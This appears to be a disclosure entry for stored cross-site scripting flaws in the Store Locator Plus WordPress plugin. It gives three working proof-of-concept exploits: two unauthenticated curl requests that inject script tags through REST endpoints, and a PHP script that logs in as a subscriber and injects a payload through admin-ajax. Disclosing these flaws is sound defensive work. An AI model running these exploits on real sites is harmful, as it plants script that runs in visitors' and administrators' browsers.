There are several endpoints in the plugin that could allow unauthenticated attackers the ability to inject malicious JavaScript into pages.
PoC #1 curl -i -s -k -X $'POST' --data-binary $'value=<script>alert(0)</script>' $'http://[SITE_URL]/wp-json/store-locator-plus/v2/options/label_radius/[MD5-OF-SITE-URL-HERE]/' PoC #2 curl -i -s -k -X $'POST' \ --data $'file-meta={\"url\":\"https://URL/slp_settings.json\"}' $'http://[YOURTARGETURL]/wp-json/store-locator-plus/v2/options/import/' Where slp_settings.json is: {"store-locator-le":{"settings":{"options":{"label_radius":"<script>alert(\"howdy\")</script>"}}}} PoC #3 *Requires Authentication <?php // Settings $wp_url = $argv[1]; $wp_user = $argv[2]; $wp_pass = $argv[3]; // Log in as subscriber $ch = curl_init(); $cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-'); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'log' => $wp_user, 'pwd' => $wp_pass, 'rememberme' => 'forever', 'wp-submit' => 'Log+In', ]); $output = curl_exec($ch); curl_close($ch); //XSS $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ 'action' => 'slp_change_option', 'formdata[option_name]' => 'options_nojs[label_radius]', 'formdata[option_value]' => '<script>alert(1)</script>' ]); $content = curl_exec($ch); echo $content; ?>
Chloe Chamberland
Chloe Chamberland
Yes
2021-04-26 (about 1 years ago)
2021-04-27 (about 1 years ago)
2022-09-06 (about 6 months ago)